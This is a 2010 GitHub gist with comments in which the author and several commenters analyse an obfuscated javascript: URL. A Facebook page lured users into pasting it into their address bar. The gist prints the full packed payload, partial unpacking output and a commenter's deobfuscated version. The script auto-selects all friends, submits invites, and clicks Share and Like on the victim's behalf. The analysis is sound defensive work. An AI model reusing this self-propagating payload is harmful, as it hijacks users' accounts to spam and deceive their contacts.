Skip to content

Instantly share code, notes, and snippets.

@bruntonspall

bruntonspall/Evil Javascript

Created May 12, 2010 16:23
Show Gist options
  • Save bruntonspall/398782 to your computer and use it in GitHub Desktop.
Save bruntonspall/398782 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Evil Javascript
This app - http://www.facebook.com/pages/Only-5-of-rocket-scientists-know-the-answer-to-this/111715792203070?v=info#!/pages/Only-5-of-rocket-scientists-know-the-answer-to-this/111715792203070
uses social hacking to get you to paste the following javascript url into your address bar:
javascript:(function(){a='app115061155198097_jop';b='app115061155198097_jode';ifc='app115061155198097_ifc';ifo='app115061155198097_ifo';mw='app115061155198097_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('P e=["\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D","\\l\\h\\D\\k\\f","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x","\\y\\g\\x\\x\\f\\j","\\g\\j\\j\\f\\z\\R\\K\\L\\S","\\p\\n\\k\\A\\f","\\l\\A\\o\\o\\f\\l\\h","\\k\\g\\G\\f\\q\\f","\\l\\k\\g\\j\\G","\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l","\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h","\\t\\k\\g\\t\\G","\\g\\j\\g\\h\\v\\p\\f\\j\\h","\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h","\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k","\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q","\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u","\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o","\\g\\j\\u\\A\\h","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f","\\Z\\y\\n\\z\\f","\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h"];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];d[e[2]](e[1j])[e[1]][e[0]]=e[3]},1k)},1l)},1m)},O);',62,85,'||||||||||||||_0x82af|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||mw|fs|SocialGraphManager|for|in|if|20|ifo|ifc|21|2000|4000|3000'.split('|'),0,{}))})();
I've manually run the unpacker as far as getting
function (p,a,c,k,e,r)
{e=function(c)
{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String))
{
while(c--)
r[e(c)]=k[c]||e(c);
k=[ function(e){return r[e]}];
e=function(){return'\\w+'};
c=1
};
while(c--)
if(k[c])
p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
return p
}
packer('P e=["\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D","\\l\\h\\D\\k\\f","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x","\\y\\g\\x\\x\\f\\j","\\g\\j\\j\\f\\z\\R\\K\\L\\S","\\p\\n\\k\\A\\f","\\l\\A\\o\\o\\f\\l\\h","\\k\\g\\G\\f\\q\\f","\\l\\k\\g\\j\\G","\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l","\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h","\\t\\k\\g\\t\\G","\\g\\j\\g\\h\\v\\p\\f\\j\\h","\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h","\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k","\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q","\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u","\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o","\\g\\j\\u\\A\\h","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f","\\Z\\y\\n\\z\\f","\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h"];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];d[e[2]](e[1j])[e[1]][e[0]]=e[3]},1k)},1l)},1m)},O);',62,85,'||||||||||||||_0x82af|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||mw|fs|SocialGraphManager|for|in|if|20|ifo|ifc|21|2000|4000|3000'.split('|'),0,{});
which returns
"var _0x82af=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x73\x75\x67\x67\x65\x73\x74","\x6C\x69\x6B\x65\x6D\x65","\x73\x6C\x69\x6E\x6B","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x69\x6E\x70\x75\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x53\x68\x61\x72\x65","\x70\x6F\x70\x5F\x63\x6F\x6E\x74\x65\x6E\x74"];d=document;d[_0x82af[2]](mw)[_0x82af[1]][_0x82af[0]]=_0x82af[3];d[_0x82af[2]](a)[_0x82af[4]]=d[_0x82af[2]](b)[_0x82af[5]];s=d[_0x82af[2]](_0x82af[6]);m=d[_0x82af[2]](_0x82af[7]);sl=d[_0x82af[2]](_0x82af[8]);c=d[_0x82af[10]](_0x82af[9]);c[_0x82af[12]](_0x82af[11],true,true);s[_0x82af[13]](c);setTimeout(function(){fs[_0x82af[14]]()},5000);setTimeout(function(){SocialGraphManager[_0x82af[17]](_0x82af[15],_0x82af[16]);setTimeout(function(){c[_0x82af[12]](_0x82af[11],true,true);sl[_0x82af[13]](c);setTimeout(function(){inp=document[_0x82af[19]](_0x82af[18]);for(i in inp){if(inp[i][_0x82af[5]]==_0x82af[20]){inp[i][_0x82af[13]](c)}};m[_0x82af[13]](c);setTimeout(function(){d[_0x82af[2]](ifo)[_0x82af[4]]=d[_0x82af[2]](ifc)[_0x82af[5]];d[_0x82af[2]](_0x82af[21])[_0x82af[1]][_0x82af[0]]=_0x82af[3]},2000)},4000)},3000)},5000);"
What does this do?
@joshourisman
Copy link

Looks like it dynamically changes the href of some link on the page from one value to another. Some sort of phishing type scheme, no doubt. I'm far too lazy to figure out the specifics.

@paulbaumgart
Copy link 

> eval('var _0x82af=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x73\x75\x67\x67\x65\x73\x74","\x6C\x69\x6B\x65\x6D\x65","\x73\x6C\x69\x6E\x6B","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x69\x6E\x70\x75\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x53\x68\x61\x72\x65","\x70\x6F\x70\x5F\x63\x6F\x6E\x74\x65\x6E\x74"]')
> print(_0x82af)
visibility,style,getElementById,hidden,innerHTML,value,suggest,likeme,slink,MouseEvents,createEvent,click,initEvent,dispatchEvent,select_all,sgm_invite_form,/ajax/social_graph/invite_dialog.php,submitDialog,input,getElementsByTagName,Share,pop_content

@trun
Copy link

trun commented May 12, 2010

http://pastebin.com/Y6qq2Hgr

Looks like it probably invites all your friends to some garbage.

@jwillmoth
Copy link 

document.getElementById.('app115061155198097_mwrapper').style.visibility = 'hidden';

document.getElementById.('app115061155198097_jop').innerHTML = document.getElementById.('app115061155198097_jode').value;

objSuggest = document.getElementById('suggest');
objLikeme = document.getElementById('likeme');

objSlink = document.getElementById('slink');

mouseevents = document.createEvent(MouseEvents);
mouseevents.initEvent('click',true,true);

objSuggest.dispatchEvent(mouseevents);

setTimeout(
    function() {
        fs.select_all()
    },
    5000
);
    
setTimeout(
    function(){
        SocialGraphManager.submitDialog('sgm_invite_form','/ajax/social_graph/invite_dialog.php');
        setTimeout(
            function() {
                mouseevents.initEvent(click,true,true);
                objSlink.dispatchEvent(mouseevents);
                setTimeout(
                    function(){
                        inputs = document.getElementsByTagName('input');
                        for(i in inputs) {
                            if(inputs[i].value == 'Share') {
                                inputs[i].dispatchEvent(mouseevents)
                            }
                        };
                        objLikeme.dispatchEvent(mouseevents);
                        setTimeout(
                            function(){
                                document.getElementById.('app115061155198097_ifo').innerHTML = document.getElementById.('app115061155198097_ifc').value;
                                document.getElementById.('pop_content').style.visibility = hidden
                            },
                            2000
                        )
                    },
                    4000
                )
            },
            3000
        )
    },
    5000
);

@ntulip
Copy link

ntulip commented May 12, 2010

seems to be the first exploit based on the social graph. Facebook (assuming they've seen this) has probably disabled the app (115061155198097)

@bruntonspall
Copy link
Author

Excellent - thanks everyone!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment